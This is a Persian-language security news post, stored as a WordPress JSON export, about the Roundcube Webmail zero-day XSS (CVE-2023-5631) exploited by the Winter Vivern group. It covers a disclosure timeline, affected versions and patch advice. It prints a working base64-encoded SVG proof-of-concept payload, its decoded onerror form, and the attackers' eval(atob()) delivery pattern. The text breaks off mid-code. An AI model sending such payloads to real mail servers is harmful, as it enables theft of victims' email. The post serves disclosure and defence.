{"id":50682,"date":"2023-10-28T14:59:01","date_gmt":"2023-10-28T11:59:01","guid":{"rendered":"https:\/\/onhexgroup.ir\/?p=4950"},"modified":"2023-10-31T08:46:33","modified_gmt":"2023-10-31T05:16:33","slug":"%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-%d8%b2%db%8c%d8%b1%d9%88%d8%af%db%8c-%d8%af%d8%b1-roundcube-webmail-%d9%87%d8%af%d9%81-%d9%87%da%a9%d8%b1%d9%87%d8%a7%db%8c-%d8%b1%d9%88%d8%b3","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-%d8%b2%db%8c%d8%b1%d9%88%d8%af%db%8c-%d8%af%d8%b1-roundcube-webmail-%d9%87%d8%af%d9%81-%d9%87%da%a9%d8%b1%d9%87%d8%a7%db%8c-%d8%b1%d9%88%d8%b3\/","title":{"rendered":"\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc \u062f\u0631 Roundcube Webmail \u0647\u062f\u0641 \u0647\u06a9\u0631\u0647\u0627\u06cc \u0631\u0648\u0633\u06cc"},"content":{"rendered":"<p><span class=\"rt-reading-time\"><span class=\"rt-label rt-prefix\">\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647: <\/span> <span class=\"rt-time\">4<\/span> <span class=\"rt-label rt-postfix\">\u062f\u0642\u06cc\u0642\u0647<\/span><\/span><\/p>\n<p>\u0645\u062d\u0642\u0642\u0627\u06cc ESET \u06cc\u0647 \u06af\u0632\u0627\u0631\u0634\u06cc \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0646 \u062f\u0631 \u062e\u0635\u0648\u0635 \u06cc\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc XSS \u062f\u0631 Roundcube Webmail \u06a9\u0647 \u0627\u062e\u06cc\u0631\u0627 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc \u0631\u0648\u0633\u06cc Winter Vivern \u0628\u0627\u0647\u0627\u0634 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u0648 \u06cc\u0647 \u0627\u062a\u0627\u0642 \u0641\u06a9\u0631 \u062f\u0631 \u0627\u0631\u0648\u067e\u0627 \u0631\u0648 \u0647\u06a9 \u06a9\u0631\u062f\u0646.<\/p>\n<p>\u062c\u062f\u0648\u0644 \u0632\u0645\u0627\u0646\u06cc \u0627\u0641\u0634\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc :<\/p>\n<ul>\n<li>12 \u0627\u06a9\u062a\u0628\u0631 2023 : \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0628\u0647 \u062a\u06cc\u0645 Roundcube \u06af\u0632\u0627\u0631\u0634 \u062f\u0627\u062f\u0646.<\/li>\n<li>14 \u0627\u06a9\u062a\u0628\u0631 2023 : \u062a\u06cc\u0645 Roundcube \u060c \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u062a\u0627\u06cc\u06cc\u062f \u0648 \u0627\u0648\u0646\u0648 \u0627\u0635\u0644\u0627\u062d \u06a9\u0631\u062f\u0647.<\/li>\n<li>16 \u0627\u06a9\u062a\u0628\u0631 2023 : \u0627\u0635\u0644\u0627\u062d\u06cc\u0647 \u0647\u0627\u06cc\u06cc \u0631\u0648 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 (1.6.4, 1.5.5, 1.4.15)<\/li>\n<li>18 \u0627\u06a9\u062a\u0628\u0631 2023 : ESET CNA \u06cc\u0647 CVE \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0631\u0627\u0626\u0647 \u062f\u0627\u062f\u0647.<\/li>\n<li>25 \u0627\u06a9\u062a\u0628\u0631 2023 : \u06af\u0632\u0627\u0631\u0634 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0646.<\/li>\n<\/ul>\n<p>\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0632 \u0646\u0648\u0639 XSS \u0647\u0633\u062a\u0634 \u0648 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u0627 \u0627\u0631\u0633\u0627\u0644 \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0648 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646 \u062a\u06af SVG \u0645\u062e\u0631\u0628 \u062f\u0631 \u0633\u0648\u0631\u0633 HTML \u060c \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0648 \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0631\u0648 \u0631\u0648\u0634 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0647\u060c \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u0631\u0627\u06cc \u0633\u0631\u0642\u062a \u0627\u06cc\u0645\u06cc\u0644\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0627\u06a9\u0627\u0646\u062a \u06cc\u0627 \u0645\u0648\u0627\u0631\u062f \u062f\u06cc\u06af\u0647 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0634\u0647.<\/p>\n<p>\u0645\u062b\u0644\u0627 \u06a9\u062f \u0632\u06cc\u0631 \u062f\u0631 \u0633\u0648\u0631\u0633 HTML \u0627\u06cc\u0645\u06cc\u0644 \u0642\u0631\u0627\u0631 \u0628\u062f\u06cc\u062f \u0648 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u06cc\u062f :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd5d0632739065\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\"> &lt;svg&gt;&lt;use href=&#8221;dAta:image\/s\tvg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2&#8243;&gt;<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd5d0632739065-1\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">svg<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-st\">use<\/span> <span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;dAta:image\/s vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0010 seconds] --><\/p>\n<p>\u0645\u0648\u0642\u0639 \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0627\u06cc\u0645\u06cc\u0644 \u060c \u06a9\u062f \u0632\u06cc\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd5ec066355435\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\">&lt;br \/&gt;<br \/>\n&lt;svg id=&#8221;x2&#8243; xmlns=&#8221;http:\/\/www.w3.org\/2000\/svg&#8221;&gt; &lt;image href=&#8221;x&#8221; onerror=&#8221;alert(234)&#8221; \/&gt;&lt;\/svg&gt;<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd5ec066355435-1\" class=\"crayon-line\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">svg <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x2&#8221;<\/span> <span class=\"crayon-v\">xmlns<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/www.w3.org\/2000\/svg&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">image <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x&#8221;<\/span> <span class=\"crayon-v\">onerror<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;alert(234)&#8221;<\/span> <span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">svg<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0002 seconds] --><\/p>\n<p>Roundcube \u06cc\u0647 \u0627\u0628\u0632\u0627\u0631 \u0645\u062a\u0646 \u0628\u0627\u0632 \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0639\u0645\u062f\u062a\u0627 \u062f\u0631 \u0628\u062e\u0634 \u0627\u06cc\u0645\u06cc\u0644 \u0633\u0627\u06cc\u062a\u0647\u0627 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u06af\u06cc\u0631\u0647. \u0645\u062b\u0644\u0627 CPanel \u0634\u0627\u0645\u0644 \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0647\u0633\u062a\u0634.<\/p>\n<p>\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 :<\/p>\n<p>\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0642\u0628\u0644 \u0627\u0632 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\/tag\/1.4.15\" target=\"_blank\" rel=\"noopener\">1.4.15<\/a> \u0648 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\/tag\/1.5.5\" target=\"_blank\" rel=\"noopener\">1.5.5<\/a> \u0648 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\/tag\/1.6.4\" target=\"_blank\" rel=\"noopener\">1.6.4<\/a><\/p>\n<p>\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc\u00a0 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 :<\/p>\n<p>\u0628\u0631\u0627\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0642\u0631\u0627\u0631 \u0646\u06af\u06cc\u0631\u06cc\u062f\u060c \u0628\u0627\u06cc\u062f \u0628\u0647 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc 1.4.15 \u0648 1.5.5 \u0648 1.6.4 \u0627\u0631\u062a\u0642\u0627\u0621 \u0628\u062f\u06cc\u062f.<\/p>\n<p>\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0637\u0648\u0631\u06cc \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0628\u0627 \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628\u060c \u0647\u06a9 \u0645\u06cc\u0634\u06cc\u062f\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u062a\u0648\u0635\u06cc\u0647 \u0634\u062f\u0647\u060c \u062d\u062a\u0645\u0627 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0631\u0648 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f.<\/p>\n<h2>\u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc Winter Vivern :<\/h2>\n<p>\u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc Winter Vivern \u06a9\u0647 \u0642\u0628\u0644\u0627 \u0647\u0645 \u0645\u0637\u0627\u0644\u0628\u06cc \u062f\u0631 \u062e\u0635\u0648\u0635\u0634\u0648\u0646 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u06cc\u0645\u060c \u06cc\u0647 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc \u062c\u0627\u0633\u0648\u0633\u06cc \u0647\u0633\u062a\u0634\u060c \u06a9\u0647 \u0627\u0648\u0644\u06cc\u0646 \u0628\u0627\u0631 \u062f\u0631 \u0633\u0627\u0644 2021 \u062a\u0648\u0633\u0637 <a href=\"https:\/\/www.domaintools.com\/resources\/blog\/winter-vivern-a-look-at-re-crafted-government-maldocs\/\" target=\"_blank\" rel=\"noopener\">DomainTools<\/a> \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f. \u0627\u062d\u062a\u0645\u0627\u0644 \u0645\u06cc\u062f\u0646 \u062d\u062f\u0627\u0642\u0644 \u0627\u0632 \u0633\u0627\u0644 2020 \u0641\u0639\u0627\u0644 \u0647\u0633\u062a\u0634 \u0648 \u0639\u0645\u062f\u062a\u0627 \u06a9\u0634\u0648\u0631\u0647\u0627\u06cc \u0627\u0631\u0648\u067e\u0627\u06cc\u06cc \u0648 \u0622\u0633\u06cc\u0627\u06cc \u0645\u0631\u06a9\u0632\u06cc \u0631\u0648 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc\u062f\u0647. \u062a\u06a9\u062a\u06cc\u06a9\u0647\u0627\u06cc\u06cc \u0647\u0645 \u06a9\u0647 \u0627\u063a\u0644\u0628 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u06a9\u0646\u0646\u060c \u0627\u0633\u0646\u0627\u062f \u0645\u062e\u0631\u0628 \u060c \u0628\u06a9\u062f\u0648\u0631\u0647\u0627\u06cc \u067e\u0627\u0648\u0631\u0634\u0644\u06cc \u0648 \u0641\u06cc\u0634\u06cc\u0646\u06af \u0633\u0627\u06cc\u062a\u0647\u0627 \u0647\u0633\u062a\u0634. \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u0645\u0639\u062a\u0642\u062f\u0646\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u060c \u0628\u0627 \u06af\u0631\u0648\u0647 <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/\" target=\"_blank\" rel=\"noopener\">MoustachedBouncer<\/a> \u06a9\u0647 \u0647\u0645\u0633\u0648 \u0628\u0627 \u0628\u0644\u0627\u0631\u0648\u0633 \u060c \u0645\u0631\u062a\u0628\u0637 \u0647\u0633\u062a\u0634.<\/p>\n<p>Winter Vivern \u062a\u0642\u0631\u06cc\u0628\u0627 \u0627\u0632 \u0633\u0627\u0644 2022 \u0634\u0631\u0648\u0639 \u0628\u0647 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0627\u06cc\u0645\u06cc\u0644 Zimbra \u0648 Roundcube \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc\u00a0 \u06a9\u0631\u062f\u0647. \u0645\u062b\u0644\u0627 \u062f\u0631 \u0622\u06af\u0648\u0633\u062a \u0648 \u0633\u067e\u062a\u0627\u0645\u0628\u0631 2023 \u060c \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u0627\u0632 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc XSS \u0628\u0647 \u0634\u0646\u0627\u0633\u0647 CVE-2020-35730 \u062f\u0631 Roundcube \u0628\u0631\u0627\u06cc \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646 \u0642\u0631\u0628\u0627\u0646\u06cc\u0627\u0634\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647. \u0627\u0644\u0628\u062a\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06af\u0631\u0648\u0647 <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/eset-sednit-full.pdf\" target=\"_blank\" rel=\"noopener\">Sednit<\/a> \u06a9\u0647 \u0628\u0647 APT28 \u0647\u0645 \u0645\u0639\u0631\u0648\u0641 \u0647\u0633\u062a\u0646\u060c \u0647\u0645 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647.<\/p>\n<h2>\u062c\u0632\u06cc\u06cc\u0627\u062a \u0641\u0646\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc :<\/h2>\n<p>\u0628\u0631\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc CVE-2023-5631 \u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628 \u0631\u0648 \u0628\u0633\u0627\u0632\u0647 \u0648 \u0628\u0647 \u0642\u0631\u0628\u0627\u0646\u06cc \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0647. \u062f\u0631 \u0627\u06cc\u0646 \u06a9\u0645\u067e\u06cc\u0646\u060c \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0627\u0632 team.managment@outlook[.]com \u0648 \u0628\u0627 \u0645\u0648\u0636\u0648\u0639 Get started in your Outlook \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u06a9\u0646\u0647 :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4951\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3.webp\" sizes=\"auto, (max-width: 466px) 100vw, 466px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3.webp 466w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-5.webp 282w\" alt=\"\u0627\u06cc\u0645\u06cc\u0644 \u0627\u0631\u0633\u0627\u0644\u06cc \u0627\u0632 wintervivern\" width=\"466\" height=\"496\" data-dominant-color=\"f3f3f4\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u0627\u06cc\u0646 \u0627\u06cc\u0645\u06cc\u0644 \u062f\u0631 \u0646\u06af\u0627\u0647 \u0627\u0648\u0644\u060c \u0645\u062e\u0631\u0628 \u0628\u0647 \u0646\u0638\u0631 \u0646\u0645\u06cc\u0627\u062f \u0627\u0645\u0627 \u0627\u06af\u0647 \u06a9\u062f\u0647\u0627\u06cc HTML \u0627\u0648\u0646\u0648 \u0631\u0648 \u0645\u0634\u0627\u0647\u062f\u0647 \u06a9\u0646\u06cc\u062f\u060c \u0647\u0645\u0648\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u0642\u0627\u0628\u0644 \u0645\u0634\u0627\u0647\u062f\u0647 \u0647\u0633\u062a\u0634\u060c \u062f\u0631 \u0627\u0646\u062a\u0647\u0627\u06cc \u067e\u06cc\u0627\u0645 \u06cc\u0647 \u062a\u06af SVG \u0647\u0633\u062a\u0634 \u06a9\u0647 \u062d\u0627\u0648\u06cc \u06cc\u0647 \u067e\u06cc\u0644\u0648\u062f base64 \u0634\u062f\u0647 \u0647\u0633\u062a\u0634 :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4952\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-1.webp\" sizes=\"auto, (max-width: 1129px) 100vw, 1129px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-1.webp 1129w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-6.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-7.webp 1024w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-8.webp 768w\" alt=\"\u0633\u0648\u0631\u0633 \u06a9\u062f \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628\" width=\"1129\" height=\"994\" data-dominant-color=\"f6f6f5\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u0628\u0635\u0648\u0631\u062a \u062f\u0642\u06cc\u0642\u062a\u0631 :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4953\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-2.webp\" sizes=\"auto, (max-width: 1261px) 100vw, 1261px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-2.webp 1261w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-9.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-10.webp 1024w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-11.webp 768w\" alt=\"\u062a\u06af svg\" width=\"1261\" height=\"145\" data-dominant-color=\"f5f6f2\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u0627\u06af\u0647 \u0627\u06cc\u0646 \u0645\u0642\u062f\u0627\u0631 base64 \u0631\u0648 \u062f\u06cc\u06a9\u062f \u06a9\u0646\u06cc\u0645 (\u062f\u0631 \u0634\u06a9\u0644 \u0628\u0627\u0644\u0627 \u0645\u0642\u062f\u0627\u0631 \u067e\u06cc\u0644\u0648\u062f base64 \u0634\u062f\u0647 \u06a9\u0627\u0645\u0644 \u0646\u06cc\u0633\u062a \u0648 \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0634\u062f\u0647 \u0647\u0633\u062a\u0634)\u060c \u0628\u0647 \u06a9\u062f \u0632\u06cc\u0631 \u0645\u06cc\u0631\u0633\u06cc\u0645 :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd5f2883353949\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\">&lt;br \/&gt;<br \/>\n&lt;svg id=&#8221;x&#8221; xmlns=&#8221;http:\/\/www.w3.org\/2000\/svg&#8221;&gt; &lt;image href=&#8221;x&#8221; onerror=&#8221;eval(atob(&#8216;&lt;base64-encoded payload&gt;&#8217;))&#8221; \/&gt;&lt;\/svg&gt;<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd5f2883353949-1\" class=\"crayon-line\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">svg <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x&#8221;<\/span> <span class=\"crayon-v\">xmlns<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/www.w3.org\/2000\/svg&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">image <\/span><span class=\"crayon-v\">href<\/span><span 